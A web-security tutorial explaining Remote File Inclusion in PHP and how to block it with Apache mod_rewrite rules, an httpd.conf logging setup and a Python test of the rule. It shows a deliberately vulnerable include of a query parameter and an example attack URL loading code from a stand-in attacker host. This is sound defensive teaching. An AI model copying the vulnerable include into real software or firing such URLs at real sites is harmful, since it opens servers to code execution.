Using mod_rewrite to prevent the inclusion of remote files

Article written by Claudio Garau

One of the most frequent attacks suffered by websites is the attempt to include files containing malicious code. In theory the attack is very simple to carry out: all it takes is a file containing the malicious code and a URL to type into the browser.

This type of attack, known by the technical term Remote File Inclusion or simply by the acronym RFI, is often associated with an intrusion technique called XSA (Cross-Server Attack), usually carried out to compromise the security of websites, if not of the web server itself, which makes RFI even more dangerous.

To launch an RFI attack, an attacker needs a "space" within an application in which to perform the remote inclusion; this "space" is generally a security "hole" (a bug) that makes a script vulnerable.
The classic case of a weakness susceptible to RFI is passing the name of the page to load through a request variable; a simple piece of code like this is enough to jeopardize an application:

 <?php
 // Include the file named by the "pagina" query-string parameter
 // (vulnerable: the value comes straight from the request and is never validated)
 include($_GET['pagina']);
 ?>
In this code we have an undefined variable, or rather a variable whose value is defined by the parameter sent through the query string. For example, if the URL of the page containing the listing above looked like this:

 http://www.sito.com/index.php?pagina=news.php

the value of $_GET['pagina'] would be "news.php", and an attack on this application could be carried out in this manner:

 http://www.sito.com/index.php?pagina=http://www.attacco.com/x.php

The file "x.php", if the attack succeeds, could contain any type of malicious code and cause damage far more substantial and permanent than the simplicity of the attack might lead one to think.

Fortunately, there are some defensive techniques that can be used to prevent such attacks; in this brief discussion we will analyze one based on the URL rewriting module (mod_rewrite) provided by the Apache web server, which can be applied in different ways.

One of the most classic ways to send instructions to an Apache web server is to use an .htaccess file placed in the folder you want to protect from the attack.

The first method we will use is to insert a simple rule in an .htaccess file:

 # The rewrite engine must be enabled for the rule below to take effect
 RewriteEngine on

 # Reject any request whose query string carries a URL scheme followed by "://"
 RewriteCond %{QUERY_STRING} (.*)(http|https|ftp):\/\/(.*)
 RewriteRule ^(.+)$ - [F]

The rule states that the arguments passed in the query string ("{QUERY_STRING}") may not contain the prefixes "http", "https" or "ftp" followed by "://", regardless of what precedes or follows them ("(.*)"). If this happens, the web server returns a 403 (Forbidden) error. Note that the comparison is case-sensitive unless the [NC] flag is added to the RewriteCond, and that every parameter containing one of these prefixes is rejected, including legitimate ones (for example a referrer URL passed as a parameter), so the rule should be tested against the application's real query strings before being deployed.
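To see exactly which requests the rule above accepts and rejects before deploying it, here is an added example (not part of the original article) that evaluates the article's RewriteCond pattern against a few constructed query strings, including the effect of the optional [NC] flag; the `nocase` parameter and the sample requests are assumptions made for the demonstration.

```python
import re

# The article's RewriteCond pattern, copied as written for .htaccess/httpd.conf.
# Apache compiles it with PCRE; Python's re module accepts the same syntax here.
RFI_PATTERN = r"(.*)(http|https|ftp):\/\/(.*)"


def rule_blocks(query_string: str, nocase: bool = False) -> bool:
    """Return True when the RewriteCond would match and the [F] rule would fire.

    nocase=True models adding the [NC] flag to the RewriteCond (an assumption
    about a hardened rule; the article's rule does not set it), which makes the
    scheme comparison case-insensitive.
    """
    flags = re.IGNORECASE if nocase else 0
    # RewriteCond tests the raw query string and the pattern is unanchored,
    # so a match anywhere in the string (re.search semantics) fires the rule.
    return re.search(RFI_PATTERN, query_string, flags) is not None


def simulate(query_strings, nocase: bool = False) -> dict:
    """Map each query string to the HTTP status the rule would produce:
    403 when the request is rejected, 200 when it is passed through untouched."""
    return {qs: (403 if rule_blocks(qs, nocase) else 200) for qs in query_strings}


# Constructed sample requests: the article's legitimate and attack URLs,
# plus two variants that show the limits of the rule.
SAMPLES = [
    "pagina=news.php",                           # the article's legitimate request
    "pagina=http://www.attacco.com/x.php",       # the article's RFI example
    "pagina=https://www.attacco.com/x.php",
    "pagina=ftp://www.attacco.com/x.php",
    "pagina=HTTP://www.attacco.com/x.php",       # mixed-case scheme: only caught with [NC]
    "ref=http://www.sito.com/&pagina=news.php",  # harmless URL parameter is rejected too
]

if __name__ == "__main__":
    for label, nocase in (("rule as written", False), ("rule with [NC]", True)):
        print(label)
        for qs, status in simulate(SAMPLES, nocase).items():
            print(f"  {status}  ?{qs}")
```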

Those who have direct access to the Apache configuration file (httpd.conf) can insert a single container with directives whose effect is comparable to the rule shown previously:

 # Check that mod_rewrite is available
 <IfModule mod_rewrite.c>

     # Activate the URL rewrite engine
     RewriteEngine on

     # Set our rule against RFI
     RewriteCond %{QUERY_STRING} (.*)(http|https|ftp):\/\/(.*)

     # Reject the requests that look like inclusion attempts and mark them
     # with an environment variable [E=varname:value]
     RewriteRule ^(.+)$ - [F,E=RFI:true]

 </IfModule>

 # Create a log of the RFI attempts identified above, selected through the
 # environment variable set by the rule (variable names are case-sensitive)
 CustomLog /folder_name/rfi.log combined env=RFI
After adding the directives to the configuration file, save the changes and restart the web server for them to take effect. Note that at the end of the listing, outside the container, we inserted the directive that creates a log file intended to record remote file inclusion requests; monitoring this small "blocking notebook for RFI attacks" will reveal that Remote File Inclusion attempts against our websites are less uncommon than believed.